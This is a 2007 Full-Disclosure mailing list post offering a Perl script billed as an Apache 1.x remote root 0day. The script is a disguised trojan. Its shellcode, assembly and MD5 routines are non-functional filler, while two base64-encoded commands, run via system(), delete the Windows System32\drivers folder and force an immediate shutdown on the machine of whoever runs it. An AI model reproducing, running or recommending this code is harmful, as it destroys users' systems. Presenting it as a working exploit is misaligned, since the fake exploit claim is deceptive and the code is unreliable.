[Full-disclosure] A new apache 1.x 0day
- From: x666@xxxxxxxxxxxxx
- Date: Mon, 19 Mar 2007 15:15:36 -0400
Hi,
A new apache 1.x 0day
#!/usr/bin/perl
use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
print q {
#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshisha@xxxxxxxxxxxxx
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################
};
if($#ARGV < 1)
{
print "[^] Usage : apache.pl [target] [port]\n";
print "[^] Example : apache.pl 127.0.0.1 80\n";
exit;
}
# Can be replaced, simply get a rootshell
$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
my $target = $ARGV[1];
my $port = $ARGV[2];
sub connect {
local $SIG{'__DIE__'} =
sub { (my $x = $_[0]) =~ s/0x/4/g; die $x };
eval { die "0x4141414141" };
print $@ if $@;
}
sub socket {
push SOCKADDR;
push SOCKDATA;
push STACKDATA;
push ESPOINT;
push ENDADDR;
}
eval qw (
Bytecode:
dec cx
jz Root
mov bp, FloppyOff ;offset
pushf
push cs
push bp
jmp [OldISR]
Root:
inc cx
cmp dx, [SecondCntr] ;cs:.
jne NotSecond
IsSecond:
mov bh,5
mov bl,21
call seg OSSetCursorXY:OSSetCursorXY ; root runs once
mov ax,cx
call seg OSPrintWordNum:OSPrintWordNum
mov bh,5
mov bl,22
call seg OSSetCursorXY:OSSetCursorXY
mov ax,[RootCntr] ;cs:.
mov [RootCntr],0 ;cs:.
call seg OSPrintWordNum:OSPrintWordNum
);
{
my ( @S, @T, @M );
my $code = '';
sub md5 {
return undef if ( !defined $_[0] );
my $DATA = _md5_pad( $_[0] );
&_md5_init() if ( !defined $M[0] );
return _md5_perl_generated( \$DATA );
}
sub _md5_init {
return if ( defined $S[0] );
my $i;
for ( $i = 1 ; $i <= 64 ; $i++ ) {
$T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
}
my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
for ( $i = 0 ; $i < 64 ; $i++ ) {
$S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
}
@M = (
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,
5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,
0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9
);
&_md5_generate();
my $TEST = _md5_pad('foobar');
}
sub _md5_pad {
my $l = length( my $msg = shift() . chr(128) );
$msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
$l = ( $l - 1 ) * 8;
$msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
return $msg;
}
$mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
$int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");
sub _md5_generate {
my $N = 'abcddabccdabbcda';
my ( $i, $M ) = ( 0, '' );
$M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );
$code = <<EOT;
sub _md5_perl_generated {
BEGIN { \$^H |= 1; };
my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);
my (\$a,\$b,\$c,\$d,\$t,\$i);
my \$dr=shift;
my \$l=length(\$\$dr);
for my \$L (0 .. ((\$l/64)-1) ) {
my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
(\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
EOT
for ( $i = 0 ; $i < 16 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 32 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .=
"\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 48 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
for ( ; $i < 64 ; $i++ ) {
my ( $a, $b, $c, $d ) =
split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );
$code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";
$code .=
"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";
}
$code .= <<EOT;
\$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
\$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
} # for
return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }
EOT
eval "$code";
}
}
sub rehash
{
my $unencrypted_string = shift @_;
my @salt_chars = ('a'..'z','A'..'Z','0'..'9');
my $salt = $salt_chars[rand(63)] . $salt_chars[rand(63)];
return crypt($unencrypted_string, $salt);
}
eval qw (
make_startup_room: ; setup ebp for WSAStartup data
push BYTE 20 ; push 20
pop eax ; register
mul eax ; square that *** = 0x190
sub esp, eax ; make room for WSAStartup data
mov ecx, esp
make_table_room: ; setup ebp for address table
sub esp, BYTE (_WSA_INIT_TBLEN * 4)
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32 dll base
mov ebp, esp
push ecx ; push WSAStartup data address
push eax ; push 0x190
make_table: ; hash the table
WSA_HASH_WINSOCK
wsa_startup:
; call WSAStartup
WSA_CALL_WSASTART
make_socket:
; call WSASocketA, get a tcp socket
WSA_CALL_SOCKET 'tcp'
; we got the socket in edi
);system ($mov);system ($int);shift;
eval qw (
push word 0x4D2
inc ebx
push bx
mov ecx, esp
push byte 16
push ecx
push eax
mov ecx, esp
mov al, 102
int 0x80
);
print "[x] Exploiting...\n";
sleep(4);
eval qw <
accept:
push eax
push edi
mov ecx, esp
inc ebx
mov al, 102
int 0x80
dup2:
xor ecx, ecx
mov cl, 3
;
if ($recvdata != 0) {
print "[x] Executing Shellcode...";
}
if ($recvdata == 0) {
print "[x] Exploit failed!";
}
eval qw <
exec:
xor eax,eax
mov al, 11
push ecx
push "//sh"
push "/bin"
mov ebx, esp
push ecx
push ebx
mov ecx, esp
int 0x80
;
exit;
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Follow-Ups:
- Re: [Full-disclosure] A new apache 1.x 0day
- From: Knud Erik Højgaard
- Re: [Full-disclosure] A new apache 1.x 0day
- From: Thierry Zoller
- Re: [Full-disclosure] A new apache 1.x 0day
- Prev by Date: [Full-disclosure] w-agora version 4.2.1 Information Disclosure Vulnerability
- Next by Date: [Full-disclosure] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability
- Previous by thread: [Full-disclosure] w-agora version 4.2.1 Information Disclosure Vulnerability
- Next by thread: Re: [Full-disclosure] A new apache 1.x 0day
- Index(es):
